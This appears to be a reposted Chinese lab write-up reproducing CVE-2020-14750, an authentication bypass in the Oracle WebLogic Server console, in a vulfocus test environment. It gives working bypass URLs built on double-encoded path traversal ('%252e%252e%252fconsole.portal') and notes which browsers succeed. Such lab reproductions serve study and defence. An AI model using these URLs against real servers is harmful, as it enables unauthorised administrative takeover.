CVE |
您所在的位置:网站首页 › weblogic权限绕过 › CVE |
漏洞简介 事项 描述 漏洞概述 远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console 影响范围 10.3.6.0、12.1.3.0、12.2.1.3、12.2.1.4、14.1.1.0 漏洞编号 CVE-2020-14750 漏洞搭建这里使用vulfocus进行复现。 ![]() 访问http://192.168.146.167:34029/console/login/LoginForm.jsp,搭建成功。 需要注意的是,需要我们先登录才行,不登陆就无法进行未授权,weblogic/welcome1。这里我是在虚拟机里面进行登录的,下面的验证是在本机进行验证的。 ![]() 访问http://192.168.146.167:34029/console/css/%252e%252e%252fconsole.portal,发现有些浏览器可以绕过登录,比如火狐浏览器或者谷歌浏览器。 ![]() 但是,使用Edge浏览器的时候,发现绕不了,很奇怪。 ![]() 于是自己一直进行尝试,找到了有个Edge浏览器也可以绕过的url。访问http://192.168.146.167:34029/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=DomainConfigGeneralPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29。 ![]() 然后尝试查找上传文件的地方,找了很久发现没有文件上传的地方。。。正常的流程是在后台有一个锁定并编辑的按钮的,但是我没有。 |
今日新闻 |
推荐新闻 |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |